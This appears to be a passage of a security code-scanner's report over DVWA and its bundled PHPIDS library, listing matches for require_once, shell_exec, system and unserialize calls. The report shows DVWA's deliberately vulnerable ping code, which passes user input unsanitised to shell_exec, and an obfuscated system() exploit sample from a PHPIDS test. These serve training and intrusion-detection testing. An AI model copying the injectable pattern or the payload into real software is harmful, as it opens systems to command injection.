33-$page[ 'source_button' ] = 'upload';
./vulnerabilities/view_help.php:4 (20/58) OK | Dubious | Bad | Hide 
1-<?php
2-
3-define( 'DVWA_WEB_PAGE_TO_ROOT', '../' );
4:require_once DVWA_WEB_PAGE_TO_ROOT.'dvwa/includes/dvwaPage.inc.php';
5-
6-dvwaPageStartup( array( 'authenticated', 'phpids' ) );
7-
./vulnerabilities/sqli/index.php:4 (21/58) OK | Dubious | Bad | Hide 
1-<?php
2-
3-define( 'DVWA_WEB_PAGE_TO_ROOT', '../../' );
4:require_once DVWA_WEB_PAGE_TO_ROOT.'dvwa/includes/dvwaPage.inc.php';
5-
6-dvwaPageStartup( array( 'authenticated', 'phpids' ) );
7-
./vulnerabilities/sqli/index.php:30 (22/58) OK | Dubious | Bad | Hide 
27-		break;
28-}
29-
30:require_once DVWA_WEB_PAGE_TO_ROOT."vulnerabilities/sqli/source/{$vulnerabilityFile}";
31-
32-$page[ 'help_button' ] = 'sqli';
33-$page[ 'source_button' ] = 'sqli';
./vulnerabilities/view_source_all.php:3 (23/58) OK | Dubious | Bad | Hide 
1-<?php
2-define( 'DVWA_WEB_PAGE_TO_ROOT', '../' );
3:require_once DVWA_WEB_PAGE_TO_ROOT.'dvwa/includes/dvwaPage.inc.php';
4-
5-dvwaPageStartup( array( 'authenticated', 'phpids' ) );
6-
./vulnerabilities/xss_s/index.php:4 (24/58) OK | Dubious | Bad | Hide 
1-<?php
2-
3-define( 'DVWA_WEB_PAGE_TO_ROOT', '../../' );
4:require_once DVWA_WEB_PAGE_TO_ROOT.'dvwa/includes/dvwaPage.inc.php';
5-
6-dvwaPageStartup( array( 'authenticated', 'phpids' ) );
7-
./vulnerabilities/xss_s/index.php:30 (25/58) OK | Dubious | Bad | Hide 
27-		break;
28-}
29-
30:require_once DVWA_WEB_PAGE_TO_ROOT."vulnerabilities/xss_s/source/{$vulnerabilityFile}";
31-
32-$page[ 'help_button' ] = 'xss_s';
33-$page[ 'source_button' ] = 'xss_s';
./vulnerabilities/xss_r/index.php:4 (26/58) OK | Dubious | Bad | Hide 
1-<?php
2-
3-define( 'DVWA_WEB_PAGE_TO_ROOT', '../../' );
4:require_once DVWA_WEB_PAGE_TO_ROOT.'dvwa/includes/dvwaPage.inc.php';
5-
6-dvwaPageStartup( array( 'authenticated', 'phpids' ) );
7-
./vulnerabilities/xss_r/index.php:30 (27/58) OK | Dubious | Bad | Hide 
27-		break;
28-}
29-
30:require_once DVWA_WEB_PAGE_TO_ROOT."vulnerabilities/xss_r/source/{$vulnerabilityFile}";
31-
32-$page[ 'help_button' ] = 'xss_r';
33-$page[ 'source_button' ] = 'xss_r';
./external/phpids/0.6/docs/examples/example.php:30 (28/58) OK | Dubious | Bad | Hide 
27-    session_start();
28-}
29-
30:require_once 'IDS/Init.php';
31-
32-try {
33-
./external/phpids/0.6/docs/examples/example.php:87 (29/58) OK | Dubious | Bad | Hide 
84-        /*
85-        * The following steps are optional to log the results
86-        */
87:        require_once 'IDS/Log/File.php';
88:        require_once 'IDS/Log/Composite.php';
89-
90-        $compositeLog = new IDS_Log_Composite();
91-        $compositeLog->addLogger(IDS_Log_File::getInstance($init));
./external/phpids/0.6/docs/examples/example.php:101 (30/58) OK | Dubious | Bad | Hide 
98-        */
99-        /*
100-        *
101:        require_once 'IDS/Log/Email.php';
102:        require_once 'IDS/Log/Database.php';
103-
104-        $compositeLog->addLogger(
105-            IDS_Log_Email::getInstance($init),
./external/phpids/0.6/tests/IDS/ReportTest.php:22 (31/58) OK | Dubious | Bad | Hide 
19- * @version	SVN: $Id:ReportTest.php 515 2007-09-15 13:43:40Z christ1an $
20- */
21-
22:require_once 'PHPUnit/Framework/TestCase.php';
23-set_include_path(get_include_path() . PATH_SEPARATOR . dirname(__FILE__) . '/../../lib');
24:require_once 'IDS/Report.php';
25:require_once 'IDS/Event.php';
26-
27-class IDS_ReportTest extends PHPUnit_Framework_TestCase
28-{
./external/phpids/0.6/tests/IDS/MonitorTest.php:21 (32/58) OK | Dubious | Bad | Hide 
18- * @package	PHPIDS tests
19- * @version	SVN: $Id:MonitorTest.php 517 2007-09-15 15:04:13Z mario $
20- */
21:require_once 'PHPUnit/Framework/TestCase.php';
22-set_include_path(get_include_path() . PATH_SEPARATOR . dirname(__FILE__) . '/../../lib');
23:require_once 'IDS/Monitor.php';
24:require_once 'IDS/Init.php';
25:require_once 'IDS/Filter/Storage.php';
26-
27-class IDS_MonitorTest extends PHPUnit_Framework_TestCase {
28-
./external/phpids/0.6/tests/IDS/EventTest.php:22 (33/58) OK | Dubious | Bad | Hide 
19- * @version	SVN: $Id:EventTest.php 515 2007-09-15 13:43:40Z christ1an $
20- */
21-
22:require_once 'PHPUnit/Framework/TestCase.php';
23-set_include_path(get_include_path() . PATH_SEPARATOR . dirname(__FILE__) . '/../../lib');
24:require_once 'IDS/Event.php';
25:require_once 'IDS/Filter.php';
26-
27-class IDS_EventTest extends PHPUnit_Framework_TestCase
28-{
./external/phpids/0.6/tests/IDS/ExceptionTest.php:22 (34/58) OK | Dubious | Bad | Hide 
19- * @version	SVN: $Id:ExceptionTest.php 517 2007-09-15 15:04:13Z mario $
20- */
21-
22:require_once 'PHPUnit/Framework/TestCase.php';
23-set_include_path(get_include_path() . PATH_SEPARATOR . dirname(__FILE__) . '/../../lib');
24:require_once 'IDS/Init.php';
25:require_once 'IDS/Caching/Factory.php';
26:require_once 'IDS/Report.php';
27:require_once 'IDS/Event.php';
28:require_once 'IDS/Filter.php';
29:require_once 'IDS/Monitor.php';
30:require_once 'IDS/Filter/Storage.php';
31-
32-class IDS_ExceptionTest extends PHPUnit_Framework_TestCase
33-{
./external/phpids/0.6/tests/IDS/FilterTest.php:22 (35/58) OK | Dubious | Bad | Hide 
19- * @version	SVN: $Id:FilterTest.php 515 2007-09-15 13:43:40Z christ1an $
20- */
21-
22:require_once 'PHPUnit/Framework/TestCase.php';
23-set_include_path(get_include_path() . PATH_SEPARATOR . dirname(__FILE__) . '/../../lib');
24:require_once 'IDS/Init.php';
25-
26-class IDS_FilterTest extends PHPUnit_Framework_TestCase
27-	{
./external/phpids/0.6/tests/IDS/InitTest.php:22 (36/58) OK | Dubious | Bad | Hide 
19- * @version    SVN: $Id:InitTest.php 517 2007-09-15 15:04:13Z mario $
20- */
21-
22:require_once 'PHPUnit/Framework/TestCase.php';
23-set_include_path(get_include_path() . PATH_SEPARATOR . dirname(__FILE__) . '/../../lib');
24:require_once 'IDS/Init.php';
25-
26-class IDS_InitTest extends PHPUnit_Framework_TestCase {
27-
./external/phpids/0.6/tests/IDS/CachingTest.php:22 (37/58) OK | Dubious | Bad | Hide 
19- * @version	SVN: $Id:CachingTest.php 515 2007-09-15 13:43:40Z christ1an $
20- */
21-
22:require_once 'PHPUnit/Framework/TestCase.php';
23-set_include_path(get_include_path() . PATH_SEPARATOR . dirname(__FILE__) . '/../../lib');
24:require_once 'IDS/Init.php';
25:require_once 'IDS/Caching/Factory.php';
26-
27-class IDS_CachingTest extends PHPUnit_Framework_TestCase {
28-
./external/phpids/0.6/tests/allTests.php:22 (38/58) OK | Dubious | Bad | Hide 
19- * @version	SVN: $Id:allTests.php 515 2007-09-15 13:43:40Z christ1an $
20- */
21-error_reporting(E_ALL | E_STRICT | @E_DEPRECATED);
22:require_once 'PHPUnit/Framework/TestSuite.php';
23:require_once 'PHPUnit/TextUI/TestRunner.php';
24:require_once 'PHPUnit/Util/Filter.php';
25-
26-PHPUnit_Util_Filter::addDirectoryToFilter(dirname(__FILE__));
27-PHPUnit_Util_Filter::addDirectoryToFilter(dirname(__FILE__) . '/../lib/IDS/vendors');
./external/phpids/0.6/tests/allTests.php:45 (39/58) OK | Dubious | Bad | Hide 
42-	public static function suite()
43-	{
44-        $suite = new PHPUnit_Framework_TestSuite('PHPIDS');
45:        require_once 'IDS/MonitorTest.php';
46-        $suite->addTestSuite('IDS_MonitorTest');
47:        require_once 'IDS/ReportTest.php';
48-        $suite->addTestSuite('IDS_ReportTest');
49:        require_once 'IDS/InitTest.php';
50-        $suite->addTestSuite('IDS_InitTest');
51:        require_once 'IDS/ExceptionTest.php';
52-        $suite->addTestSuite('IDS_ExceptionTest');
53:        require_once 'IDS/FilterTest.php';
54-        $suite->addTestSuite('IDS_FilterTest');
55:        require_once 'IDS/CachingTest.php';
56-        $suite->addTestSuite('IDS_CachingTest');
57:        require_once 'IDS/EventTest.php';
58-        $suite->addTestSuite('IDS_EventTest');
59-        return $suite;
60-	}
./external/phpids/0.6/lib/IDS/Caching/Session.php:34 (40/58) OK | Dubious | Bad | Hide 
31- * @link     http://php-ids.org/
32- */
33-
34:require_once 'IDS/Caching/Interface.php';
35-
36-/**
37- * File caching wrapper
./external/phpids/0.6/lib/IDS/Caching/Memcached.php:34 (41/58) OK | Dubious | Bad | Hide 
31- * @link     http://php-ids.org/
32- */
33-
34:require_once 'IDS/Caching/Interface.php';
35-
36-/**
37- * File caching wrapper
./external/phpids/0.6/lib/IDS/Caching/File.php:34 (42/58) OK | Dubious | Bad | Hide 
31- * @link     http://php-ids.org/
32- */
33-
34:require_once 'IDS/Caching/Interface.php';
35-
36-/**
37- * File caching wrapper
./external/phpids/0.6/lib/IDS/Caching/Database.php:34 (43/58) OK | Dubious | Bad | Hide 
31- * @link     http://php-ids.org/
32- */
33-
34:require_once 'IDS/Caching/Interface.php';
35-
36-/**
37- * Needed SQL:
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier.includes.php:14 (44/58) OK | Dubious | Bad | Hide 
11- * 
12- * @warning
13- *      You must *not* include any other HTML Purifier files before this file,
14: *      because 'require' not 'require_once' is used.
15- * 
16- * @warning
17- *      This file requires that the include path contains the HTML Purifier
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier.safe-includes.php:7 (45/58) OK | Dubious | Bad | Hide 
4- * @file
5- * This file was auto-generated by generate-includes.php and includes all of
6- * the core files required by HTML Purifier. This is a convenience stub that
7: * includes all files using dirname(__FILE__) and require_once. PLEASE DO NOT
8- * EDIT THIS FILE, changes will be overwritten the next time the script is run.
9- * 
10- * Changes to include_path are not necessary.
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier.safe-includes.php:15 (46/58) OK | Dubious | Bad | Hide 
12-
13-$__dir = dirname(__FILE__);
14-
15:require_once $__dir . '/HTMLPurifier.php';
16:require_once $__dir . '/HTMLPurifier/AttrCollections.php';
17:require_once $__dir . '/HTMLPurifier/AttrDef.php';
18:require_once $__dir . '/HTMLPurifier/AttrTransform.php';
19:require_once $__dir . '/HTMLPurifier/AttrTypes.php';
20:require_once $__dir . '/HTMLPurifier/AttrValidator.php';
21:require_once $__dir . '/HTMLPurifier/Bootstrap.php';
22:require_once $__dir . '/HTMLPurifier/Definition.php';
23:require_once $__dir . '/HTMLPurifier/CSSDefinition.php';
24:require_once $__dir . '/HTMLPurifier/ChildDef.php';
25:require_once $__dir . '/HTMLPurifier/Config.php';
26:require_once $__dir . '/HTMLPurifier/ConfigSchema.php';
27:require_once $__dir . '/HTMLPurifier/ContentSets.php';
28:require_once $__dir . '/HTMLPurifier/Context.php';
29:require_once $__dir . '/HTMLPurifier/DefinitionCache.php';
30:require_once $__dir . '/HTMLPurifier/DefinitionCacheFactory.php';
31:require_once $__dir . '/HTMLPurifier/Doctype.php';
32:require_once $__dir . '/HTMLPurifier/DoctypeRegistry.php';
33:require_once $__dir . '/HTMLPurifier/ElementDef.php';
34:require_once $__dir . '/HTMLPurifier/Encoder.php';
35:require_once $__dir . '/HTMLPurifier/EntityLookup.php';
36:require_once $__dir . '/HTMLPurifier/EntityParser.php';
37:require_once $__dir . '/HTMLPurifier/ErrorCollector.php';
38:require_once $__dir . '/HTMLPurifier/ErrorStruct.php';
39:require_once $__dir . '/HTMLPurifier/Exception.php';
40:require_once $__dir . '/HTMLPurifier/Filter.php';
41:require_once $__dir . '/HTMLPurifier/Generator.php';
42:require_once $__dir . '/HTMLPurifier/HTMLDefinition.php';
43:require_once $__dir . '/HTMLPurifier/HTMLModule.php';
44:require_once $__dir . '/HTMLPurifier/HTMLModuleManager.php';
45:require_once $__dir . '/HTMLPurifier/IDAccumulator.php';
46:require_once $__dir . '/HTMLPurifier/Injector.php';
47:require_once $__dir . '/HTMLPurifier/Language.php';
48:require_once $__dir . '/HTMLPurifier/LanguageFactory.php';
49:require_once $__dir . '/HTMLPurifier/Length.php';
50:require_once $__dir . '/HTMLPurifier/Lexer.php';
51:require_once $__dir . '/HTMLPurifier/PercentEncoder.php';
52:require_once $__dir . '/HTMLPurifier/Strategy.php';
53:require_once $__dir . '/HTMLPurifier/StringHash.php';
54:require_once $__dir . '/HTMLPurifier/StringHashParser.php';
55:require_once $__dir . '/HTMLPurifier/TagTransform.php';
56:require_once $__dir . '/HTMLPurifier/Token.php';
57:require_once $__dir . '/HTMLPurifier/TokenFactory.php';
58:require_once $__dir . '/HTMLPurifier/URI.php';
59:require_once $__dir . '/HTMLPurifier/URIDefinition.php';
60:require_once $__dir . '/HTMLPurifier/URIFilter.php';
61:require_once $__dir . '/HTMLPurifier/URIParser.php';
62:require_once $__dir . '/HTMLPurifier/URIScheme.php';
63:require_once $__dir . '/HTMLPurifier/URISchemeRegistry.php';
64:require_once $__dir . '/HTMLPurifier/UnitConverter.php';
65:require_once $__dir . '/HTMLPurifier/VarParser.php';
66:require_once $__dir . '/HTMLPurifier/VarParserException.php';
67:require_once $__dir . '/HTMLPurifier/AttrDef/CSS.php';
68:require_once $__dir . '/HTMLPurifier/AttrDef/Enum.php';
69:require_once $__dir . '/HTMLPurifier/AttrDef/Integer.php';
70:require_once $__dir . '/HTMLPurifier/AttrDef/Lang.php';
71:require_once $__dir . '/HTMLPurifier/AttrDef/Switch.php';
72:require_once $__dir . '/HTMLPurifier/AttrDef/Text.php';
73:require_once $__dir . '/HTMLPurifier/AttrDef/URI.php';
74:require_once $__dir . '/HTMLPurifier/AttrDef/CSS/Number.php';
75:require_once $__dir . '/HTMLPurifier/AttrDef/CSS/AlphaValue.php';
76:require_once $__dir . '/HTMLPurifier/AttrDef/CSS/Background.php';
77:require_once $__dir . '/HTMLPurifier/AttrDef/CSS/BackgroundPosition.php';
78:require_once $__dir . '/HTMLPurifier/AttrDef/CSS/Border.php';
79:require_once $__dir . '/HTMLPurifier/AttrDef/CSS/Color.php';
80:require_once $__dir . '/HTMLPurifier/AttrDef/CSS/Composite.php';
81:require_once $__dir . '/HTMLPurifier/AttrDef/CSS/DenyElementDecorator.php';
82:require_once $__dir . '/HTMLPurifier/AttrDef/CSS/Filter.php';
83:require_once $__dir . '/HTMLPurifier/AttrDef/CSS/Font.php';
84:require_once $__dir . '/HTMLPurifier/AttrDef/CSS/FontFamily.php';
85:require_once $__dir . '/HTMLPurifier/AttrDef/CSS/ImportantDecorator.php';
86:require_once $__dir . '/HTMLPurifier/AttrDef/CSS/Length.php';
87:require_once $__dir . '/HTMLPurifier/AttrDef/CSS/ListStyle.php';
88:require_once $__dir . '/HTMLPurifier/AttrDef/CSS/Multiple.php';
89:require_once $__dir . '/HTMLPurifier/AttrDef/CSS/Percentage.php';
90:require_once $__dir . '/HTMLPurifier/AttrDef/CSS/TextDecoration.php';
91:require_once $__dir . '/HTMLPurifier/AttrDef/CSS/URI.php';
92:require_once $__dir . '/HTMLPurifier/AttrDef/HTML/Bool.php';
93:require_once $__dir . '/HTMLPurifier/AttrDef/HTML/Color.php';
94:require_once $__dir . '/HTMLPurifier/AttrDef/HTML/FrameTarget.php';
95:require_once $__dir . '/HTMLPurifier/AttrDef/HTML/ID.php';
96:require_once $__dir . '/HTMLPurifier/AttrDef/HTML/Pixels.php';
97:require_once $__dir . '/HTMLPurifier/AttrDef/HTML/Length.php';
98:require_once $__dir . '/HTMLPurifier/AttrDef/HTML/LinkTypes.php';
99:require_once $__dir . '/HTMLPurifier/AttrDef/HTML/MultiLength.php';
100:require_once $__dir . '/HTMLPurifier/AttrDef/HTML/Nmtokens.php';
101:require_once $__dir . '/HTMLPurifier/AttrDef/URI/Email.php';
102:require_once $__dir . '/HTMLPurifier/AttrDef/URI/Host.php';
103:require_once $__dir . '/HTMLPurifier/AttrDef/URI/IPv4.php';
104:require_once $__dir . '/HTMLPurifier/AttrDef/URI/IPv6.php';
105:require_once $__dir . '/HTMLPurifier/AttrDef/URI/Email/SimpleCheck.php';
106:require_once $__dir . '/HTMLPurifier/AttrTransform/Background.php';
107:require_once $__dir . '/HTMLPurifier/AttrTransform/BdoDir.php';
108:require_once $__dir . '/HTMLPurifier/AttrTransform/BgColor.php';
109:require_once $__dir . '/HTMLPurifier/AttrTransform/BoolToCSS.php';
110:require_once $__dir . '/HTMLPurifier/AttrTransform/Border.php';
111:require_once $__dir . '/HTMLPurifier/AttrTransform/EnumToCSS.php';
112:require_once $__dir . '/HTMLPurifier/AttrTransform/ImgRequired.php';
113:require_once $__dir . '/HTMLPurifier/AttrTransform/ImgSpace.php';
114:require_once $__dir . '/HTMLPurifier/AttrTransform/Input.php';
115:require_once $__dir . '/HTMLPurifier/AttrTransform/Lang.php';
116:require_once $__dir . '/HTMLPurifier/AttrTransform/Length.php';
117:require_once $__dir . '/HTMLPurifier/AttrTransform/Name.php';
118:require_once $__dir . '/HTMLPurifier/AttrTransform/SafeEmbed.php';
119:require_once $__dir . '/HTMLPurifier/AttrTransform/SafeObject.php';
120:require_once $__dir . '/HTMLPurifier/AttrTransform/SafeParam.php';
121:require_once $__dir . '/HTMLPurifier/AttrTransform/ScriptRequired.php';
122:require_once $__dir . '/HTMLPurifier/AttrTransform/Textarea.php';
123:require_once $__dir . '/HTMLPurifier/ChildDef/Chameleon.php';
124:require_once $__dir . '/HTMLPurifier/ChildDef/Custom.php';
125:require_once $__dir . '/HTMLPurifier/ChildDef/Empty.php';
126:require_once $__dir . '/HTMLPurifier/ChildDef/Required.php';
127:require_once $__dir . '/HTMLPurifier/ChildDef/Optional.php';
128:require_once $__dir . '/HTMLPurifier/ChildDef/StrictBlockquote.php';
129:require_once $__dir . '/HTMLPurifier/ChildDef/Table.php';
130:require_once $__dir . '/HTMLPurifier/DefinitionCache/Decorator.php';
131:require_once $__dir . '/HTMLPurifier/DefinitionCache/Null.php';
132:require_once $__dir . '/HTMLPurifier/DefinitionCache/Serializer.php';
133:require_once $__dir . '/HTMLPurifier/DefinitionCache/Decorator/Cleanup.php';
134:require_once $__dir . '/HTMLPurifier/DefinitionCache/Decorator/Memory.php';
135:require_once $__dir . '/HTMLPurifier/HTMLModule/Bdo.php';
136:require_once $__dir . '/HTMLPurifier/HTMLModule/CommonAttributes.php';
137:require_once $__dir . '/HTMLPurifier/HTMLModule/Edit.php';
138:require_once $__dir . '/HTMLPurifier/HTMLModule/Forms.php';
139:require_once $__dir . '/HTMLPurifier/HTMLModule/Hypertext.php';
140:require_once $__dir . '/HTMLPurifier/HTMLModule/Image.php';
141:require_once $__dir . '/HTMLPurifier/HTMLModule/Legacy.php';
142:require_once $__dir . '/HTMLPurifier/HTMLModule/List.php';
143:require_once $__dir . '/HTMLPurifier/HTMLModule/Name.php';
144:require_once $__dir . '/HTMLPurifier/HTMLModule/NonXMLCommonAttributes.php';
145:require_once $__dir . '/HTMLPurifier/HTMLModule/Object.php';
146:require_once $__dir . '/HTMLPurifier/HTMLModule/Presentation.php';
147:require_once $__dir . '/HTMLPurifier/HTMLModule/Proprietary.php';
148:require_once $__dir . '/HTMLPurifier/HTMLModule/Ruby.php';
149:require_once $__dir . '/HTMLPurifier/HTMLModule/SafeEmbed.php';
150:require_once $__dir . '/HTMLPurifier/HTMLModule/SafeObject.php';
151:require_once $__dir . '/HTMLPurifier/HTMLModule/Scripting.php';
152:require_once $__dir . '/HTMLPurifier/HTMLModule/StyleAttribute.php';
153:require_once $__dir . '/HTMLPurifier/HTMLModule/Tables.php';
154:require_once $__dir . '/HTMLPurifier/HTMLModule/Target.php';
155:require_once $__dir . '/HTMLPurifier/HTMLModule/Text.php';
156:require_once $__dir . '/HTMLPurifier/HTMLModule/Tidy.php';
157:require_once $__dir . '/HTMLPurifier/HTMLModule/XMLCommonAttributes.php';
158:require_once $__dir . '/HTMLPurifier/HTMLModule/Tidy/Name.php';
159:require_once $__dir . '/HTMLPurifier/HTMLModule/Tidy/Proprietary.php';
160:require_once $__dir . '/HTMLPurifier/HTMLModule/Tidy/XHTMLAndHTML4.php';
161:require_once $__dir . '/HTMLPurifier/HTMLModule/Tidy/Strict.php';
162:require_once $__dir . '/HTMLPurifier/HTMLModule/Tidy/Transitional.php';
163:require_once $__dir . '/HTMLPurifier/HTMLModule/Tidy/XHTML.php';
164:require_once $__dir . '/HTMLPurifier/Injector/AutoParagraph.php';
165:require_once $__dir . '/HTMLPurifier/Injector/DisplayLinkURI.php';
166:require_once $__dir . '/HTMLPurifier/Injector/Linkify.php';
167:require_once $__dir . '/HTMLPurifier/Injector/PurifierLinkify.php';
168:require_once $__dir . '/HTMLPurifier/Injector/RemoveEmpty.php';
169:require_once $__dir . '/HTMLPurifier/Injector/SafeObject.php';
170:require_once $__dir . '/HTMLPurifier/Lexer/DOMLex.php';
171:require_once $__dir . '/HTMLPurifier/Lexer/DirectLex.php';
172:require_once $__dir . '/HTMLPurifier/Strategy/Composite.php';
173:require_once $__dir . '/HTMLPurifier/Strategy/Core.php';
174:require_once $__dir . '/HTMLPurifier/Strategy/FixNesting.php';
175:require_once $__dir . '/HTMLPurifier/Strategy/MakeWellFormed.php';
176:require_once $__dir . '/HTMLPurifier/Strategy/RemoveForeignElements.php';
177:require_once $__dir . '/HTMLPurifier/Strategy/ValidateAttributes.php';
178:require_once $__dir . '/HTMLPurifier/TagTransform/Font.php';
179:require_once $__dir . '/HTMLPurifier/TagTransform/Simple.php';
180:require_once $__dir . '/HTMLPurifier/Token/Comment.php';
181:require_once $__dir . '/HTMLPurifier/Token/Tag.php';
182:require_once $__dir . '/HTMLPurifier/Token/Empty.php';
183:require_once $__dir . '/HTMLPurifier/Token/End.php';
184:require_once $__dir . '/HTMLPurifier/Token/Start.php';
185:require_once $__dir . '/HTMLPurifier/Token/Text.php';
186:require_once $__dir . '/HTMLPurifier/URIFilter/DisableExternal.php';
187:require_once $__dir . '/HTMLPurifier/URIFilter/DisableExternalResources.php';
188:require_once $__dir . '/HTMLPurifier/URIFilter/HostBlacklist.php';
189:require_once $__dir . '/HTMLPurifier/URIFilter/MakeAbsolute.php';
190:require_once $__dir . '/HTMLPurifier/URIFilter/Munge.php';
191:require_once $__dir . '/HTMLPurifier/URIScheme/ftp.php';
192:require_once $__dir . '/HTMLPurifier/URIScheme/http.php';
193:require_once $__dir . '/HTMLPurifier/URIScheme/https.php';
194:require_once $__dir . '/HTMLPurifier/URIScheme/mailto.php';
195:require_once $__dir . '/HTMLPurifier/URIScheme/news.php';
196:require_once $__dir . '/HTMLPurifier/URIScheme/nntp.php';
197:require_once $__dir . '/HTMLPurifier/VarParser/Flexible.php';
198:require_once $__dir . '/HTMLPurifier/VarParser/Native.php';
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier.kses.php:8 (47/58) OK | Dubious | Bad | Hide 
5- * Emulation layer for code that used kses(), substituting in HTML Purifier.
6- */
7-
8:require_once dirname(__FILE__) . '/HTMLPurifier.auto.php';
9-
10-function kses($string, $allowed_html, $allowed_protocols = null) {
11-    $config = HTMLPurifier_Config::createDefault();
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier.auto.php:8 (48/58) OK | Dubious | Bad | Hide 
5- */
6-
7-set_include_path(dirname(__FILE__) . PATH_SEPARATOR . get_include_path() );
8:require_once 'HTMLPurifier/Bootstrap.php';
9:require_once 'HTMLPurifier.autoload.php';
./external/phpids/0.6/lib/IDS/Log/Composite.php:34 (49/58) OK | Dubious | Bad | Hide 
31- * @link     http://php-ids.org/
32- */
33-
34:require_once 'IDS/Log/Interface.php';
35-
36-/**
37- * Log Composite
./external/phpids/0.6/lib/IDS/Log/File.php:34 (50/58) OK | Dubious | Bad | Hide 
31- * @link     http://php-ids.org/
32- */
33-
34:require_once 'IDS/Log/Interface.php';
35-
36-/**
37- * File logging wrapper
./external/phpids/0.6/lib/IDS/Log/Email.php:34 (51/58) OK | Dubious | Bad | Hide 
31- * @link     http://php-ids.org/
32- */
33-
34:require_once 'IDS/Log/Interface.php';
35-
36-/**
37- * Email logging wrapper
./external/phpids/0.6/lib/IDS/Log/Database.php:34 (52/58) OK | Dubious | Bad | Hide 
31- * @link     http://php-ids.org/
32- */
33-
34:require_once 'IDS/Log/Interface.php';
35-
36-/*
37- * Needed SQL:
./setup.php:4 (53/58) OK | Dubious | Bad | Hide 
1-<?php
2-
3-define( 'DVWA_WEB_PAGE_TO_ROOT', '' );
4:require_once DVWA_WEB_PAGE_TO_ROOT.'dvwa/includes/dvwaPage.inc.php';
5-
6-dvwaPageStartup( array( 'phpids' ) );
7-
./phpinfo.php:3 (54/58) OK | Dubious | Bad | Hide 
1-<?php
2-define( 'DVWA_WEB_PAGE_TO_ROOT', '' );
3:require_once DVWA_WEB_PAGE_TO_ROOT.'dvwa/includes/dvwaPage.inc.php';
4-
5-dvwaPageStartup( array( 'authenticated', 'phpids' ) );
6-
./dvwa/includes/dvwaPage.inc.php:15 (55/58) OK | Dubious | Bad | Hide 
12-
13-
14-// Include configs
15:require_once DVWA_WEB_PAGE_TO_ROOT.'config/config.inc.php';
16-
17:require_once( 'dvwaPhpIds.inc.php' );
18-
19-// Declare the $html variable
20-if(!isset($html)){
./dvwa/includes/dvwaPhpIds.inc.php:14 (56/58) OK | Dubious | Bad | Hide 
11-// Add PHPIDS to include path
12-set_include_path( get_include_path().PATH_SEPARATOR.DVWA_WEB_PAGE_TO_PHPIDS.'lib/' );
13-
14:require_once 'IDS/Init.php';
15-
16-function dvwaPhpIdsVersionGet() {
17-	return '0.6';
./dvwa/includes/dvwaPhpIds.inc.php:74 (57/58) OK | Dubious | Bad | Hide 
71-		$result = $ids->run();
72-
73-		if (!$result->isEmpty()) {
74:			require_once 'IDS/Log/File.php';
75:			require_once 'IDS/Log/Composite.php';
76-
77-			$compositeLog = new IDS_Log_Composite();
78-			$compositeLog->addLogger(IDS_Log_File::getInstance($init));
./logout.php:4 (58/58) OK | Dubious | Bad | Hide 
1-<?php
2-
3-define( 'DVWA_WEB_PAGE_TO_ROOT', '' );
4:require_once DVWA_WEB_PAGE_TO_ROOT.'dvwa/includes/dvwaPage.inc.php';
5-
6-dvwaPageStartup( array( 'phpids' ) );
7-

shell_exec( (3) Top | Hide

./vulnerabilities/exec/source/low.php:10 (1/3) OK | Dubious | Bad | Hide 
8-	if (stristr(php_uname('s'), 'Windows NT')) { 
9-	
10:		$cmd = shell_exec( 'ping  ' . $target );
11-		$html .= '<pre>'.$cmd.'</pre>';
12-		
13-	} else { 
14-	
15:		$cmd = shell_exec( 'ping  -c 3 ' . $target );
16-		$html .= '<pre>'.$cmd.'</pre>';
17-		
18-	}
./vulnerabilities/exec/source/high.php:23 (2/3) OK | Dubious | Bad | Hide 
20-		// Determine OS and execute the ping command.
21-		if (stristr(php_uname('s'), 'Windows NT')) { 
22-	
23:			$cmd = shell_exec( 'ping  ' . $target );
24-			$html .= '<pre>'.$cmd.'</pre>';
25-		
26-		} else { 
27-	
28:			$cmd = shell_exec( 'ping  -c 3 ' . $target );
29-			$html .= '<pre>'.$cmd.'</pre>';
30-		
31-		}
./vulnerabilities/exec/source/medium.php:18 (3/3) OK | Dubious | Bad | Hide 
15-	// Determine OS and execute the ping command.
16-	if (stristr(php_uname('s'), 'Windows NT')) { 
17-	
18:		$cmd = shell_exec( 'ping  ' . $target );
19-		$html .= '<pre>'.$cmd.'</pre>';
20-		
21-	} else { 
22-	
23:		$cmd = shell_exec( 'ping  -c 3 ' . $target );
24-		$html .= '<pre>'.$cmd.'</pre>';
25-		
26-	}

system( (1) Top | Hide

./external/phpids/0.6/tests/IDS/MonitorTest.php:1021 (1/1) OK | Dubious | Bad | Hide 
1019-                        define ( _a, "0008avwga000934mm40re8n5n3aahgqvaga0a303") ;
1020-                        if  ( !0) $c = USXWATKXACICMVYEIkw71cLTLnHZHXOTAYADOCXC ^ _a;
1021:                        if  ( !0) system($c) ;//';
1022-        $exploits[] = '" ; //
1023-                        if (!0) $_a ="". str_rot13(\'cevags\'); //
1024-                        $_b = HTTP_USER_AGENT; //

unserialize( (6) Top | Hide

./external/phpids/0.6/lib/IDS/Caching/File.php:169 (1/6) OK | Dubious | Bad | Hide 
167-        if (file_exists($this->path) && (time()-filectime($this->path)) < 
168-            $this->config['expiration_time']) {
169:            $data = unserialize(file_get_contents($this->path));
170-              return $data;
171-        }
172-
./external/phpids/0.6/lib/IDS/Caching/Database.php:192 (2/6) OK | Dubious | Bad | Hide 
189-            $result->execute(array($this->type));
190-
191-            foreach ($result as $row) {
192:                return unserialize($row['data']);
193-            }
194-
195-        } catch (PDOException $e) {
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/DefinitionCache/Serializer.php:33 (3/6) OK | Dubious | Bad | Hide 
30-    public function get($config) {
31-        $file = $this->generateFilePath($config);
32-        if (!file_exists($file)) return false;
33:        return unserialize(file_get_contents($file));
34-    }
35-    
36-    public function remove($config) {
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/ConfigSchema.php:54 (4/6) OK | Dubious | Bad | Hide 
51-     * Unserializes the default ConfigSchema.
52-     */
53-    public static function makeFromSerial() {
54:        return unserialize(file_get_contents(HTMLPURIFIER_PREFIX . '/HTMLPurifier/ConfigSchema/schema.ser'));
55-    }
56-    
57-    /**
